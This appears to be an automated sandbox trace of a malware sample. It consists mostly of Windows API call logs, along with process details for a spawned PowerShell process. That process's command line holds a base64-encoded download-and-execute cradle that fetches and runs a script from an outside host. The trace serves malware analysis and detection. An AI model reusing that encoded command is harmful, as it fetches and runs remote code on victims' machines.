	[0195.893] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x6dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5fcec1c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5fcec1c*=0x6d8) returned 1
	[0195.893] GetLastError () returned 0x0

Thread:
	id = 215
	os_tid = 0xb94


Thread:
	id = 221
	os_tid = 0x284

	[0189.932] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0189.935] ResetEvent (hEvent=0x39c) returned 1
	[0189.935] GetLastError () returned 0x0

Thread:
	id = 224
	os_tid = 0x984


Thread:
	id = 256
	os_tid = 0xc20


Thread:
	id = 349
	os_tid = 0xd8c


Process:
	id = "9"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3dcb9000"
	os_pid = "0x7cc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 109
	os_tid = 0x978

	[0102.176] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0102.968] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0102.968] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0102.968] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0102.968] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0104.484] GetVersionExW (in: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.486] GetVersionExW (in: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdae0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.499] GetVersionExW (in: lpVersionInformation=0xcd850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.500] SetErrorMode (uMode=0x1) returned 0x1
	[0104.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9b0 | out: lpFileInformation=0xcd9b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0104.501] SetErrorMode (uMode=0x1) returned 0x1
	[0104.505] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc20 | out: lpdwHandle=0xcdc20) returned 0x94c
	[0104.507] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cb71d0 | out: lpData=0x2cb71d0) returned 1
	[0104.509] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb98, puLen=0xcdb90 | out: lplpBuffer=0xcdb98*=0x2cb726c, puLen=0xcdb90) returned 1
	[0104.512] lstrlenW (lpString="䅁") returned 1
	[0104.571] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb7348, puLen=0xcdb00) returned 1
	[0104.572] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0104.575] CoTaskMemAlloc (cb=0x2e) returned 0x2289b0
	[0104.575] lstrcpyW (in: lpString1=0x2289b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0104.576] CoTaskMemFree (pv=0x2289b0) 
	[0104.576] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb739c, puLen=0xcdb00) returned 1
	[0104.576] lstrlenW (lpString="System.Management.Automation") returned 28
	[0104.576] CoTaskMemAlloc (cb=0x3c) returned 0x1a1c40
	[0104.576] lstrcpyW (in: lpString1=0x1a1c40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0104.576] CoTaskMemFree (pv=0x1a1c40) 
	[0104.576] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb73f8, puLen=0xcdb00) returned 1
	[0104.576] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0104.576] CoTaskMemAlloc (cb=0x20) returned 0x22d970
	[0104.576] lstrcpyW (in: lpString1=0x22d970, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0104.576] CoTaskMemFree (pv=0x22d970) 
	[0104.576] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb7438, puLen=0xcdb00) returned 1
	[0104.576] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0104.576] CoTaskMemAlloc (cb=0x44) returned 0x1a1c40
	[0104.576] lstrcpyW (in: lpString1=0x1a1c40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0104.576] CoTaskMemFree (pv=0x1a1c40) 
	[0104.576] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb74a0, puLen=0xcdb00) returned 1
	[0104.576] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0104.576] CoTaskMemAlloc (cb=0x76) returned 0x1c8930
	[0104.576] lstrcpyW (in: lpString1=0x1c8930, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0104.576] CoTaskMemFree (pv=0x1c8930) 
	[0104.576] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb753c, puLen=0xcdb00) returned 1
	[0104.576] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0104.577] CoTaskMemAlloc (cb=0x44) returned 0x1a1c40
	[0104.577] lstrcpyW (in: lpString1=0x1a1c40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0104.577] CoTaskMemFree (pv=0x1a1c40) 
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb75a0, puLen=0xcdb00) returned 1
	[0104.577] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0104.577] CoTaskMemAlloc (cb=0x58) returned 0x190990
	[0104.577] lstrcpyW (in: lpString1=0x190990, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0104.577] CoTaskMemFree (pv=0x190990) 
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb761c, puLen=0xcdb00) returned 1
	[0104.577] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0104.577] CoTaskMemAlloc (cb=0x20) returned 0x22d970
	[0104.577] lstrcpyW (in: lpString1=0x22d970, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0104.577] CoTaskMemFree (pv=0x22d970) 
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x2cb72c4, puLen=0xcdb00) returned 1
	[0104.577] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0104.577] CoTaskMemAlloc (cb=0x66) returned 0x1ae570
	[0104.577] lstrcpyW (in: lpString1=0x1ae570, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0104.577] CoTaskMemFree (pv=0x1ae570) 
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x0, puLen=0xcdb00) returned 0
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x0, puLen=0xcdb00) returned 0
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdb08, puLen=0xcdb00 | out: lplpBuffer=0xcdb08*=0x0, puLen=0xcdb00) returned 0
	[0104.577] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdad8, puLen=0xcdad0 | out: lplpBuffer=0xcdad8*=0x2cb726c, puLen=0xcdad0) returned 1
	[0104.578] CoTaskMemAlloc (cb=0x204) returned 0x1cfb20
	[0104.578] VerLanguageNameW (in: wLang=0x0, szLang=0x1cfb20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0104.579] CoTaskMemFree (pv=0x1cfb20) 
	[0104.579] VerQueryValueW (in: pBlock=0x2cb71d0, lpSubBlock="\\", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2cb71f8, puLen=0xcdb20) returned 1
	[0104.585] GetCurrentProcessId () returned 0x7cc
	[0104.600] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcca50 | out: lpLuid=0xcca50*(LowPart=0x14, HighPart=0)) returned 1
	[0104.603] GetCurrentProcess () returned 0xffffffffffffffff
	[0104.604] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcca70 | out: TokenHandle=0xcca70*=0x2ec) returned 1
	[0104.604] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2cbaa48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0104.606] CloseHandle (hObject=0x2ec) returned 1
	[0104.609] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2ec
	[0104.681] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2cbaab0, cb=0x200, lpcbNeeded=0xcda88 | out: lphModule=0x2cbaab0, lpcbNeeded=0xcda88) returned 1
	[0104.684] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f600000, lpmodinfo=0x2cbad20, cb=0x18 | out: lpmodinfo=0x2cbad20*(lpBaseOfDll=0x13f600000, SizeOfImage=0x77000, EntryPoint=0x13f60c63c)) returned 1
	[0104.685] CoTaskMemAlloc (cb=0x804) returned 0x231c70
	[0104.685] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f600000, lpBaseName=0x231c70, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0104.685] CoTaskMemFree (pv=0x231c70) 
	[0104.686] CoTaskMemAlloc (cb=0x804) returned 0x231c70
	[0104.686] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f600000, lpFilename=0x231c70, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0104.686] CoTaskMemFree (pv=0x231c70) 
	[0104.687] CloseHandle (hObject=0x2ec) returned 1
	[0104.695] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2ec
	[0104.696] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xcdbb8 | out: lpExitCode=0xcdbb8*=0x103) returned 1
	[0104.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cbb088, Length=0x20000, ResultLength=0xcdb80 | out: SystemInformation=0x12cbb088, ResultLength=0xcdb80*=0x12ec0) returned 0x0
	[0104.718] EnumWindows (lpEnumFunc=0x2a466ac, lParam=0x0) returned 1
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.719] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x538
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x514
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x778
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.720] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x458
	[0104.721] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.721] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa18
	[0104.721] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x978
	[0104.721] GetWindow (hWnd=0x14017c, uCmd=0x4) returned 0x0
	[0104.722] IsWindowVisible (hWnd=0x14017c) returned 0
	[0104.722] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x838
	[0104.722] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb2c
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8d4
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x874
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9a8
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xb40
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xa00
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.723] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x4ac
	[0104.786] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9f0
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9e0
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9d0
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9c0
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9b0
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x9a0
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x990
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x980
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x970
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x960
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x950
	[0104.787] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x940
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x930
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x920
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x910
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x900
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8f0
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8e0
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8d0
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8c0
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8b0
	[0104.788] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x8a0
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x890
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x880
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x870
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x860
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x850
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x840
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x830
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x820
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x810
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x20c
	[0104.789] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7c4
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0xc0
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x688
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x6c0
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x408
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x7d4
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x544
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x540
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x71c
	[0104.790] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xcd8e0 | out: lpdwProcessId=0xcd8e0) returned 0x31c
